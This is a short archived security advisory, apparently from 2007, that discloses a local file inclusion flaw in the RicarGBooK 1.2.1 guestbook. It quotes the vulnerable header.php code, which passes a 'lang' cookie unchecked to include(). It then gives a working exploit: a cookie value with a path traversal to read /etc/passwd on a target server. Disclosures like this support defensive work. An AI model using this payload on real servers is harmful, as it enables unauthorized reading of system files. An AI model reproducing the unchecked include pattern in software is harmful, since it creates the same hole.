Lucene search
SecurityvulnsSECURITYVULNS:DOC:16775HistoryApr 19, 2007 - 12:00 a.m.
RicarGBooK 1.2.1 (header.php lang) Local File Inclusion Vulnerability
2007-04-1900:00:00
vulners.com
65
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
RicarGBooK 1.2.1
-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
Author :
Dj7xpl / Dj7xpl[at]Yahoo[dot]com -
Type :
Local File Inclusion Vulnerabilitiy By Cookie -
Download :
http://ricargbook.adrielmedia.com
-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Vuln Code : -=-= Header.php =-=-
if (isset($HTTP_COOKIE_VARS["lang"])) {
$guest_lang = $HTTP_COOKIE_VARS["lang"];
include ('languages/'.$guest_lang);
} else {
$guest_lang = $language;
include ('languages/'.$language);
-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
Vuln And Example Picture :
Edit Cookie : Server : http://[Target] Name : lang Value : Local File E.g : ../../../../etc/passwd [X] http://dj7xpl.by.ru/r1.jpg [X] http://dj7xpl.by.ru/r2.jpg
-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-